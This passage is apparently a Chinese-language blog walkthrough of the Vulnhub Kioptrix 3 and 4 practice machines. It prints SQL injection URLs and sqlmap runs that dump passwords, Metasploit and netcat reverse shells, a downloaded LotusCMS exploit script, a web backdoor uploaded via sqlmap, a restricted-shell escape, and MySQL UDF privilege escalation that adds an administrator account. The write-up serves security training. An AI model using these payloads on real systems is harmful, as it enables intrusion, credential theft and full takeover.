</pre><p>用<code>msfvenom</code>生成一個圖片馬</p><p>咱們在後臺上傳圖片的地方上傳一個圖片</p><p>修改已有的圖片，並獲得圖片的名，</p><p>利用msf監聽端口</p><p>利用文件包含，包含上傳圖片，這個地方比較雞肋。由於這個絕對路徑咱們是得不到的。</p><pre class="md-fences mock-cm md-end-block" lang="">http://kioptrix3.com/index.php?system=../../../../../../../home/www/kioptrix3.com/gallery/photos/thumb_1a2o44437j.jpg%00.
</pre><p>訪問返回一個shell。</p><pre class="md-fences mock-cm md-end-block" lang="" style="break-inside: unset;">msf > use multi/handler
msf exploit(multi/handler) > set PAYLOAD php/meterpreter/reverse_tcp
PAYLOAD => php/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LHOST 192.168.43.177
LHOST => 192.168.43.177
msf exploit(multi/handler) > set LPORT 443
LPORT => 443
msf exploit(multi/handler) > run
 
[*] Started reverse TCP handler on 192.168.43.177:443 
[*] Sending stage (37775 bytes) to 192.168.43.158
[*] Meterpreter session 1 opened (192.168.43.177:443 -> 192.168.43.158:51226) at 2018-05-08 12:53:09 -0400
 
meterpreter > ls
Listing: /home/www/kioptrix3.com
================================
 
Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
40777/rwxrwxrwx   4096   dir   2011-04-15 09:21:17 -0400  cache
40777/rwxrwxrwx   4096   dir   2011-04-14 12:24:17 -0400  core
40777/rwxrwxrwx   4096   dir   2011-04-14 12:24:17 -0400  data
100644/rw-r--r--  23126  fil   2011-04-14 12:23:13 -0400  favicon.ico
40755/rwxr-xr-x   4096   dir   2011-04-14 11:32:31 -0400  gallery
100644/rw-r--r--  26430  fil   2011-04-14 12:23:13 -0400  gnu-lgpl.txt
100644/rw-r--r--  399    fil   2011-04-14 12:23:13 -0400  index.php
40777/rwxrwxrwx   4096   dir   2011-04-14 12:24:17 -0400  modules
40777/rwxrwxrwx   4096   dir   2011-04-14 12:24:17 -0400  style
100644/rw-r--r--  243    fil   2011-04-14 12:23:13 -0400  update.php
</pre><p>權限有點小，不少命令都執行不了的。</p><h3><a name='header-n10259' class='md-header-anchor '></a>SQLmap進行SQL注入</h3><p>這個站是有的連接有問題，302跳轉到<code>kioptrix3.com</code></p><p>在<code>etc/passwd</code>添加</p><pre class="md-fences mock-cm md-end-block" lang="">192.168.43.158  kioptrix3.com
</pre><p><code>service networking restart</code>重啓服務</p><p>發現url存在SQL注入。<code>kioptrix3.com/gallery/gallery.php?id=1&sort=photoid#photos</code></p><p><img src='http://obr4sfdq7.bkt.clouddn.com/kioptrix_3_7.png' alt='' referrerPolicy='no-referrer' /></p><p>先用<code>sqlmap</code>進行注入測試，id存在報錯注入。</p><p><img src='http://obr4sfdq7.bkt.clouddn.com/kioptrix_3_8.png' alt='' referrerPolicy='no-referrer' /></p><p>嘗試查找下後臺管理員帳號密碼。</p><pre class="md-fences mock-cm md-end-block" lang="">Database: gallery                                                                              
Table: dev_accounts
[2 entries]
+----+------------+---------------------------------------------+
| id | username   | password                                    |
+----+------------+---------------------------------------------+
| 1  | dreg       | 0d3eccfb887aabd50f243b3f155c0f85 (Mast3r)   |
| 2  | loneferret | 5badcaf789d3d1d09794d8f021f40f0e (starwars) |
+----+------------+---------------------------------------------+
</pre><p>獲得管理員帳號密碼，可是在</p><p><img src='http://obr4sfdq7.bkt.clouddn.com/kioptrix_3_6.png' alt='' referrerPolicy='no-referrer' /></p><p>沒法登陸，另外找到一個登陸的地方<code>http://kioptrix3.com/gallery/gadmin/</code></p><pre class="md-fences mock-cm md-end-block" lang="">Database: gallery
Table: gallarific_users
[2 entries]
+----------+----------+
| username | password |
+----------+----------+
| admin    | n0t7t1k4 |
+----------+----------+
 
</pre><p>可是能夠登陸。</p><p>這裏雖然能夠是<code>root</code>和<code>dba</code>權限，可是沒有絕對路徑。不能直接用sqlmap進行寫shell。</p><h3><a name='header-n10291' class='md-header-anchor '></a>手注sqli</h3><pre class="md-fences mock-cm md-end-block" lang="">http://kioptrix3.com/gallery/gallery.php?id=1%20union%20select%201,2,3,4,5,6#
</pre><p>判斷一共有6列</p><pre class="md-fences mock-cm md-end-block" lang="">http://kioptrix3.com/gallery/gallery.php?id=1%20union%20select%201,version(),database(),4,5,6#
</pre><p><img src='http://obr4sfdq7.bkt.clouddn.com/kioptrix_3_9.png' alt='' referrerPolicy='no-referrer' /></p><p>獲得當前數據庫和版本號</p><pre class="md-fences mock-cm md-end-block" lang="">http://kioptrix3.com/gallery/gallery.php?id=1%20union%20select%201,group_concat(table_name),3,4,5,6%20from%20information_schema.tables%20where%20table_schema%20=%20database()#
</pre><p><img src='http://obr4sfdq7.bkt.clouddn.com/kioptrix_3_10.png' alt='' referrerPolicy='no-referrer' /></p><p>獲得當前數據庫全部的表名。</p><pre class="md-fences mock-cm md-end-block" lang="">http://kioptrix3.com/gallery/gallery.php?id=1%20union%20select%201,group_concat(column_name),3,4,5,6%20FROM%20information_schema.columns%20WHERE%20table_name%20=0x6465765f6163636f756e7473#
</pre><p><img src='http://obr4sfdq7.bkt.clouddn.com/kioptrix_3_11.png' alt='' referrerPolicy='no-referrer' /></p><p>獲取表裏的列名。</p><pre class="md-fences mock-cm md-end-block" lang="">http://kioptrix3.com/gallery/gallery.php?id=1%20union%20select%201,group_concat(username,0x3a,password),3,4,5,6%20FROM%20dev_accounts#
</pre><p><img src='http://obr4sfdq7.bkt.clouddn.com/kioptrix_3_12.png' alt='' referrerPolicy='no-referrer' /></p><h3><a name='header-n10315' class='md-header-anchor '></a>Lotus CMS 漏洞</h3><pre class="md-fences mock-cm md-end-block" lang="">root@kali:~# searchsploit Lotus CMS
------------------------------------------------------- ----------------------------------------
 Exploit Title                                         |  Path
                                                       | (/usr/share/exploitdb/)
------------------------------------------------------- ----------------------------------------
Lotus CMS Fraise 3.0 - Local File Inclusion / Remote C | exploits/php/webapps/15964.py
Lotus Core CMS 1.0.1 - Remote File Inclusion           | exploits/php/webapps/5866.txt
LotusCMS 3.0 - 'eval()' Remote Command Execution (Meta | exploits/php/remote/18565.rb
LotusCMS 3.0.3 - Multiple Vulnerabilities              | exploits/php/webapps/16982.txt
------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
</pre><p>從查詢結果看，有一個本地文件包含和一個遠程代碼執行，</p><p>這裏的本地文件包含就是咱們以前發現的那個。咱們嘗試下這個本地文件包含漏洞</p><p>嘗試發現這個漏洞好像不行。</p><p>嘗試<code>LotusCMS 3.0 - 'eval()' Remote Command Execution</code> 發現是一個rb文件。</p><p>因而</p><pre class="md-fences mock-cm md-end-block" lang="">msf > search LotusCMS
 
Matching Modules
================
 
   Name                              Disclosure Date  Rank       Description
   ----                              ---------------  ----       -----------
   exploit/multi/http/lcms_php_exec  2011-03-03       excellent  LotusCMS 3.0 eval() Remote Command Execution
 
</pre><p>利用這個漏洞進行攻擊</p><pre class="md-fences mock-cm md-end-block" lang="" style="break-inside: unset;">msf > use exploit/multi/http/lcms_php_exec 
msf exploit(multi/http/lcms_php_exec) > show options 
 
Module options (exploit/multi/http/lcms_php_exec):
 
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                     yes       The target address
   RPORT    80               yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   URI      /lcms/           yes       URI
   VHOST                     no        HTTP server virtual host
 
 
Exploit target:
 
   Id  Name
   --  ----
   0   Automatic LotusCMS 3.0
 
 
msf exploit(multi/http/lcms_php_exec) > set RHOST 192.168.43.58
RHOST => 192.168.43.58
msf exploit(multi/http/lcms_php_exec) > set PAYLOAD generic/shell_bind_tcp 
PAYLOAD => generic/shell_bind_tcp
msf exploit(multi/http/lcms_php_exec) > set URI /
URi => /
msf exploit(multi/http/lcms_php_exec) > show options 
 
Module options (exploit/multi/http/lcms_php_exec):
 
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST    192.168.43.58    yes       The target address
   RPORT    80               yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   URI      /                yes       URI
   VHOST                     no        HTTP server virtual host
 
 
Payload options (generic/shell_bind_tcp):
 
   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LPORT  4444             yes       The listen port
   RHOST  192.168.43.58    no        The target address
 
 
Exploit target:
 
   Id  Name
   --  ----
   0   Automatic LotusCMS 3.0
 
 
msf exploit(multi/http/lcms_php_exec) > run 
 
[*] Started bind handler
[-] Exploit failed [unreachable]: Rex::HostUnreachable The host (192.168.43.58:80) was unreachable.
[*] Exploit completed, but no session was created.
msf exploit(multi/http/lcms_php_exec) > set RHOST 192.168.43.158
RHOST => 192.168.43.158
msf exploit(multi/http/lcms_php_exec) > run 
 
[*] Started bind handler
[*] Using found page param: /index.php?page=index
[*] Sending exploit ...
[*] Command shell session 1 opened (192.168.43.177:44505 -> 192.168.43.158:4444) at 2018-05-08 10:02:56 -0400
 
whoami
www-data
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
ls
cache
core
data
favicon.ico
gallery
gnu-lgpl.txt
index.php
modules
style
update.php
pwd 
/home/www/kioptrix3.com
</pre><p>我嘗試用<code>cd</code>命令進入<code>gallery</code>目錄可是不行，</p><p>這裏用到<code>ls -l</code>能夠看到<code>gallery</code>目錄的文件</p><pre class="md-fences mock-cm md-end-block" lang="" style="break-inside: unset;">ls -l gallery
total 156
drwxr-xr-x 2 root root  4096 Apr 12  2011 BACK
-rw-r--r-- 1 root root  3573 Oct 10  2009 db.sql
-rw-r--r-- 1 root root   252 Apr 12  2011 g.php
drwxr-xr-x 3 root root  4096 Apr 12  2011 gadmin
-rw-r--r-- 1 root root   214 Apr 12  2011 gallery.php
-rw-r--r-- 1 root root  1440 Apr 14  2011 gconfig.php
-rw-r--r-- 1 root root   297 Apr 12  2011 gfooter.php
-rw-r--r-- 1 root root 38771 Apr 12  2011 gfunctions.php
-rw-r--r-- 1 root root  1009 Apr 12  2011 gheader.php
-rw-r--r-- 1 root root   249 Apr 12  2011 index.php
-rw-r--r-- 1 root root 10340 Apr 12  2011 install.BAK
-rw-r--r-- 1 root root   212 Apr 12  2011 login.php
-rw-r--r-- 1 root root   213 Apr 12  2011 logout.php
-rw-r--r-- 1 root root   249 Apr 12  2011 p.php
drwxrwxrwx 2 root root  4096 Apr 12  2011 photos
-rw-r--r-- 1 root root   213 Apr 12  2011 photos.php
-rw-r--r-- 1 root root   219 Apr 12  2011 post_comment.php
-rw-r--r-- 1 root root   214 Apr 12  2011 profile.php
-rw-r--r-- 1 root root    87 Oct 10  2009 readme.html
-rw-r--r-- 1 root root   213 Apr 12  2011 recent.php
-rw-r--r-- 1 root root   215 Apr 12  2011 register.php
drwxr-xr-x 2 root root  4096 Apr 13  2011 scopbin
-rw-r--r-- 1 root root   213 Apr 12  2011 search.php
-rw-r--r-- 1 root root   216 Apr 12  2011 slideshow.php
-rw-r--r-- 1 root root   211 Apr 12  2011 tags.php
drwxr-xr-x 6 root root  4096 Apr 12  2011 themes
-rw-r--r-- 1 root root    56 Oct 10  2009 version.txt
-rw-r--r-- 1 root root   211 Apr 12  2011 vote.php
</pre><p>發現<code>gconfig.php</code>配置文件，<code>cat</code>讀配置文件。</p><pre class="md-fences mock-cm md-end-block" lang="">  $GLOBALS["gallarific_path"] = "http://kioptrix3.com/gallery";
 
    $GLOBALS["gallarific_mysql_server"] = "localhost";
    $GLOBALS["gallarific_mysql_database"] = "gallery";
    $GLOBALS["gallarific_mysql_username"] = "root";
    $GLOBALS["gallarific_mysql_password"] = "fuckeyou";
 
</pre><h3><a name='header-n10339' class='md-header-anchor '></a>lotusRCE.sh</h3><pre class="md-fences mock-cm md-end-block" lang="">wget https://raw.githubusercontent.com/Hood3dRob1n/LotusCMS-Exploit/master/lotusRCE.sh
</pre><pre class="md-fences mock-cm md-end-block" lang="" style="break-inside: unset;">root@kali:~# chmod +x lotusRCE.sh
root@kali:~# ./lotusRCE.sh 192.168.43.158
 
Path found, now to check for vuln....
 
</html>Hood3dRob1n
Regex found, site is vulnerable to PHP Code Injection!
 
About to try and inject reverse shell....
what IP to use?
192.168.43.177
What PORT?
2333
 
OK, open your local listener and choose the method for back connect: 
1) NetCat -e        3) NetCat Backpipe  5) Exit
2) NetCat /dev/tcp  4) NetCat FIFO
#? 1
 
</pre><pre class="md-fences mock-cm md-end-block" lang="">root@kali:/tmp# nc -lvp 2333
listening on [any] 2333 ...
connect to [192.168.43.177] from kioptrix3.com [192.168.43.158] 56259
whoami
www-data
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
 
</pre><h2><a name='header-n10344' class='md-header-anchor '></a>權限提高</h2><p>嘗試用以前SQL注入獲得的。</p><pre class="md-fences mock-cm md-end-block" lang="">Database: gallery                                                                              
Table: dev_accounts
[2 entries]
+----+------------+---------------------------------------------+
| id | username   | password                                    |
+----+------------+---------------------------------------------+
| 1  | dreg       | 0d3eccfb887aabd50f243b3f155c0f85 (Mast3r)   |
| 2  | loneferret | 5badcaf789d3d1d09794d8f021f40f0e (starwars) |
+----+------------+---------------------------------------------+
</pre><p>進行SSH鏈接，發現第一個帳號不能沒有多大的做用，不能提權。</p><p>鏈接第二個帳號</p><pre class="md-fences mock-cm md-end-block" lang="" style="break-inside: unset;">root@kali:~# ssh loneferret@192.168.43.158
loneferret@192.168.43.158's password: 
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686
 
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
 
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
 
To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
Last login: Sat Apr 16 08:51:58 2011 from 192.168.1.106
loneferret@Kioptrix3:~$ ls
checksec.sh  CompanyPolicy.README
</pre><p>存在一個<code>CompanyPolicy.README</code>文件.</p><pre class="md-fences mock-cm md-end-block" lang="">checksec.sh  CompanyPolicy.README
loneferret@Kioptrix3:~$ cat CompanyPolicy.README 
Hello new employee,
It is company policy here to use our newly installed software for editing, creating and viewing files.
Please use the command 'sudo ht'.
Failure to do so will result in you immediate termination.
 
DG
CEO
</pre><p>英語比較垃圾，百度翻譯的意思是能夠經過<code>sudo ht</code>對文件進行編輯，建立。</p><p>在kali下嘗試</p><pre class="md-fences mock-cm md-end-block" lang="">loneferret@Kioptrix3:~$ sudo ht
Error opening terminal: xterm-256color.
</pre><p>報錯不能打開一個<code>xterm-256color.</code>終端。</p><p>回到本地環境用<code>xshell</code>鏈接是能夠打開的</p><p><img src='http://obr4sfdq7.bkt.clouddn.com/kioptrix_3_13.png' alt='' referrerPolicy='no-referrer' /></p><p>此時按<code>F3</code>，能夠輸入<code>/etc/passwd</code>或者<code>/etc/sudoers</code>文件來進行文件編輯</p><p>把/etc/passwd當前用戶的權限修改和<code>root</code>同樣便可。
<img src='http://obr4sfdq7.bkt.clouddn.com/kioptrix_3_14.png' alt='' referrerPolicy='no-referrer' /></p><p>也能夠把/etc/sudoers當前用戶的權限修改和<code>root</code>同樣便可。
<img src='http://obr4sfdq7.bkt.clouddn.com/kioptrix_3_15.png' alt='' referrerPolicy='no-referrer' /></p><p>從新登陸SSH。</p><pre class="md-fences mock-cm md-end-block" lang="" style="break-inside: unset;">root@kali:~# ssh loneferret@192.168.43.158
loneferret@192.168.43.158's password: 
Last login: Tue May  8 19:27:01 2018 from uknow-pc
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686
 
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
 
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
 
To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
root@Kioptrix3:~# id
uid=0(root) gid=0(root) groups=0(root),100(users)
root@Kioptrix3:~# whoami
root
</pre><p>此時已是<code>root</code>權限了。</p><h2><a name='header-n10381' class='md-header-anchor '></a>總結</h2><p>此次實驗過程挺長的，發現了不少地方的問題，第一是發現了<code>phpmyadmin</code>我嘗試用寫日誌的方法試試能不能拿到shell。可是發現<code>phpmyadmin</code>變量了不存在<code>general log</code>變量。</p><p>另外就是這裏有個SQL注入，能夠用<code>sqlmap</code>跑出來，是<code>root</code>權限。嘗試用<code>os-shell</code>寫shell。經過了以前用遠程命令執行獲得的絕對路徑，可是仍是沒法寫入。好像是目錄權限的問題。</p><p>在<code>phpmyadmin</code>下也沒法執行<code>INTO OUTFILE</code>函數。顯示<code>#1 - Can't create/write to file</code>。從在命令執行裏也看得出來目錄是沒有權限的。</p><p>在最後補充了一個文件包含和後臺上傳的利用，這個組合經過文件包含執行圖片木馬，獲得一個shell。雖說很雞肋，仍是感受有點厲害的。</p><p>在實驗過程當中仍是想多多嘗試多種方法的，可是實驗環境仍是有限。但在此次實驗中仍是學到了不少，作了幾回<code>vulnhub</code>的實驗了，感受提權方面仍是有學習到不少。</p><p>雖說這些環境有點不常見甚至奇葩，可是仍是在這個過程當中學到了<code>linux</code>環境下的一些以前一直匱乏的知識。</p><p> </p><h1><a name='header-n10396' class='md-header-anchor '></a>第十六節 Vulnhub滲透測試練習-Kioptrix 4</h1><hr /><p>title: Vulnhub滲透測試練習-Kioptrix 4
date: 2018-05-17 13:46:30
tags:</p><h2><a name='header-n10399' class='md-header-anchor '></a>做者：Ukonw</h2><p> </p><h3><a name='header-n10405' class='md-header-anchor '></a>信息收集</h3><p>用<code>nmap</code>進行端口掃描。</p><pre class="md-fences mock-cm md-end-block" lang="" style="break-inside: unset;">root@kali:~# nmap -sS -A 10.32.58.187
Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-17 01:57 EDT
Nmap scan report for 10.32.58.187
Host is up (0.00037s latency).
Not shown: 566 closed ports, 430 filtered ports
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey: 
|   1024 9b:ad:4f:f2:1e:c5:f2:39:14:b9:d3:a0:0b:e8:41:71 (DSA)
|_  2048 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e (RSA)
80/tcp  open  http        Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Site doesn't have a title (text/html).
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.28a (workgroup: WORKGROUP)
MAC Address: 00:0C:29:38:2D:6F (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
 
Host script results:
|_clock-skew: mean: 10h00m00s, deviation: 2h49m43s, median: 7h59m59s
|_nbstat: NetBIOS name: KIOPTRIX4, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.28a)
|   Computer name: Kioptrix4
|   NetBIOS computer name: 
|   Domain name: localdomain
|   FQDN: Kioptrix4.localdomain
|_  System time: 2018-05-17T09:58:07-04:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
 
TRACEROUTE
HOP RTT     ADDRESS
1   0.37 ms 10.32.58.187
 
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.81 seconds
</pre><p>從掃描結果能夠獲得，開發如下端口信息</p><ul><li>22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
80/tcp  open  http        Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
    139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
    445/tcp open  netbios-ssn Samba smbd 3.0.28a (workgroup: WORKGROUP)</li></ul><p>訪問80端口下的WEB服務。</p><p><img src='http://obr4sfdq7.bkt.clouddn.com/kioptrix4_1.png' alt='' referrerPolicy='no-referrer' /></p><p>嘗試萬能密碼繞過<code>'or 1=1#</code> 繞過失敗。</p><p>弱密碼<code>admin:admin</code>也是錯誤的。</p><p>嘗試<code>admin:'</code>，出現報錯。好爆出來了路徑<code>/var/www/checklogin.php</code>。</p><p><img src='http://obr4sfdq7.bkt.clouddn.com/kioptrix4_2.png' alt='' referrerPolicy='no-referrer' /></p><p>存在POST型注入。</p><h2><a name='header-n10433' class='md-header-anchor '></a>漏洞利用</h2><h3><a name='header-n10434' class='md-header-anchor '></a>sqlmap進行SQL注入</h3><p><code>sqlmap -u http://10.32.58.187/checklogin.php --data="myusername=admin&mypassword=123&Submit=Login" -p mypassword --current-user --current-db --is-dba</code></p><p>在注入的過程會遇到<code>302跳轉</code>選擇<code>n</code>。</p><pre class="md-fences mock-cm md-end-block" lang="" style="break-inside: unset;">sqlmap identified the following injection point(s) with a total of 253 HTTP(s) requests:
---
Parameter: mypassword (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: myusername=admin&mypassword=-8260' OR 6555=6555#&Submit=Login
 
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: myusername=admin&mypassword=123' OR SLEEP(5)-- UeQF&Submit=Login
---
[02:00:45] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 5.0.12
[02:00:45] [INFO] fetching current user
[02:00:45] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[02:00:45] [INFO] retrieved: root@localhost
current user:    'root@localhost'
[02:00:45] [INFO] fetching current database
[02:00:45] [INFO] retrieved: members
current database:    'members'
[02:00:45] [INFO] testing if current user is DBA
[02:00:45] [INFO] fetching current user
current user is DBA:    True
[02:00:45] [INFO] fetched data logged to text files under '/root/.sqlmap/output/10.32.58.187'
 
[*] shutting down at 02:00:45
</pre><p>經過注入獲得用戶名和密碼</p><pre class="md-fences mock-cm md-end-block" lang="">Database: members
Table: members
[2 entries]
+----+----------+-----------------------+
| id | username | password              |
+----+----------+-----------------------+
| 1  | john     | MyNameIsJohn          |
| 2  | robert   | ADGAdsafdfwt4gadfga== |
+----+----------+-----------------------+
 
</pre><p>經過<code>--os-shell</code>寫入一個<code>webshell</code>。</p><pre class="md-fences mock-cm md-end-block" lang="" style="break-inside: unset;">root@kali:~# sqlmap -u http://10.32.58.187/checklogin.php --data="myusername=admin&mypassword=123&Submit=Login" -p mypassword --os-shell
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.2.4#stable}
|_ -| . [.]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org
 
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
 
[*] starting at 02:09:06
 
[02:09:06] [INFO] resuming back-end DBMS 'mysql' 
[02:09:06] [INFO] testing connection to the target URL
[02:09:06] [INFO] heuristics detected web page charset 'ascii'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: mypassword (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: myusername=admin&mypassword=-8260' OR 6555=6555#&Submit=Login
 
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: myusername=admin&mypassword=123' OR SLEEP(5)-- UeQF&Submit=Login
---
[02:09:06] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 5.0.12
[02:09:06] [INFO] going to use a web backdoor for command prompt
[02:09:06] [INFO] fingerprinting the back-end DBMS operating system
[02:09:06] [INFO] the back-end DBMS operating system is Linux
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)
> 4
[02:09:08] [INFO] retrieved the web server document root: '/var/www'
[02:09:08] [INFO] retrieved web server absolute paths: '/var/www/checklogin.php'
[02:09:08] [INFO] trying to upload the file stager on '/var/www/' via LIMIT 'LINES TERMINATED BY' method
[02:09:08] [INFO] the file stager has been successfully uploaded on '/var/www/' - http://10.32.58.187:80/tmpuadle.php
[02:09:08] [WARNING] unable to upload the file through the web file stager to '/var/www/'
[02:09:08] [WARNING] backdoor has not been successfully uploaded through the file stager possibly because the user running the web server process has not write privileges over the folder where the user running the DBMS process was able to upload the file stager or because the DBMS and web server sit on different servers
do you want to try the same method used for the file stager? [Y/n] 
[02:09:09] [INFO] the backdoor has been successfully uploaded on '/var/www/' - http://10.32.58.187:80/tmpbcphh.php
[02:09:09] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> id
do you want to retrieve the command standard output? [Y/n/a] 
command standard output:    'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
os-shell> whoami
do you want to retrieve the command standard output? [Y/n/a] 
command standard output:    'www-data'
os-shell> cat checklogin.php
do you want to retrieve the command standard output? [Y/n/a] 
command standard output:
---
<?php
ob_start();
$host="localhost"; // Host name
$username="root"; // Mysql username
$password=""; // Mysql password
$db_name="members"; // Database name
$tbl_name="members"; // Table name
</pre><p>可是權限很小。可是獲得了數據庫的帳號密碼。</p><h3><a name='header-n10448' class='md-header-anchor '></a>經過SSH鏈接</h3><p>利用SQL注入獲得的用戶名密碼SSH登陸。</p><pre class="md-fences mock-cm md-end-block" lang="" style="break-inside: unset;">root@kali:~# ssh john@10.32.58.187
The authenticity of host '10.32.58.187 (10.32.58.187)' can't be established.
RSA key fingerprint is SHA256:3fqlLtTAindnY7CGwxoXJ9M2rQF6nn35SFMTVv56lww.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.32.58.187' (RSA) to the list of known hosts.
john@10.32.58.187's password: 
Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you  don't screw up
Type '?' or 'help' to get the list of allowed commands
john:~$ id
*** unknown command: id
john:~$ ?
cd  clear  echo  exit  help  ll  lpath  ls
john:~$ help help
Limited Shell (lshell) limited help.
Cheers.
</pre><p>從這裏咱們能夠利用的命令有</p><pre class="md-fences mock-cm md-end-block" lang="">cd  clear  echo  exit  help  ll  lpath  ls
</pre><p>重點其中有一個是<code>echo</code>。</p><p>咱們能夠利用他獲得一個<code>bash交互shell</code></p><pre class="md-fences mock-cm md-end-block" lang="">john:~$ echo os.system('/bin/bash')     
john@Kioptrix4:~$ id
uid=1001(john) gid=1001(john) groups=1001(john)
</pre><p>權限仍是當前用戶的權限。</p><h3><a name='header-n10463' class='md-header-anchor '></a>MySQL數據庫提權</h3><p>利用SQL注入獲得的數據庫帳號密碼登陸MySQL數據庫。</p><pre class="md-fences mock-cm md-end-block" lang="" style="break-inside: unset;">john@Kioptrix4:~$ mysql -u root -p
Enter password: 
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 3520
Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)
 
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
 
mysql> status;
--------------
mysql  Ver 14.12 Distrib 5.0.51a, for debian-linux-gnu (i486) using readline 5.2
 
Connection id:      3520
Current database:   
Current user:       root@localhost
SSL:            Not in use
Current pager:      stdout
Using outfile:      ''
Using delimiter:    ;
Server version:     5.0.51a-3ubuntu5.4 (Ubuntu)
Protocol version:   10
Connection:     Localhost via UNIX socket
Server characterset:    latin1
Db     characterset:    latin1
Client characterset:    latin1
Conn.  characterset:    latin1
UNIX socket:        /var/run/mysqld/mysqld.sock
Uptime:         1 hour 10 min 47 sec
</pre><p>嘗試<code>mysql udf 提權</code>。</p><p>在Windows環境下，執行命令</p><pre class="md-fences mock-cm md-end-block" lang="">USE mysql;
CREATE TABLE npn(line blob);
INSERT INTO npn values(load_file('C://xampplite//htdocs//mail//lib_mysqludf_sys.dll'));
SELECT * FROM mysql.npn INTO DUMPFILE 'c://windows//system32//lib_mysqludf_sys_32.dll';
CREATE FUNCTION sys_exec RETURNS integer SONAME 'lib_mysqludf_sys_32.dll';
SELECT sys_exec("net user npn npn12345678 /add");
SELECT sys_exec("net localgroup Administrators npn /add");
</pre><p>實現提權。</p><p>咱們在實驗環境下進行Linux環境下的UDF提權操做。</p><p>首先找到<code>lib_mysqludf_sys.so</code>的目錄。</p><pre class="md-fences mock-cm md-end-block" lang="">john@Kioptrix4:~$ whereis lib_mysqludf_sys.so
lib_mysqludf_sys: /usr/lib/lib_mysqludf_sys.so
</pre><pre class="md-fences mock-cm md-end-block" lang="" style="break-inside: unset;">mysql> use mysql;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
 
Database changed
mysql> create function sys_exec returns integer soname 'lib_mysqludf_sys.so';
ERROR 1125 (HY000): Function 'sys_exec' already exists
mysql> select sys_exec('id > /tmp/out; chown john.john /tmp/out');
ERROR 2006 (HY000): MySQL server has gone away
No connection. Trying to reconnect...
Connection id:    1
Current database: mysql
 
+-----------------------------------------------------+
| sys_exec('id > /tmp/out; chown john.john /tmp/out') |
+-----------------------------------------------------+
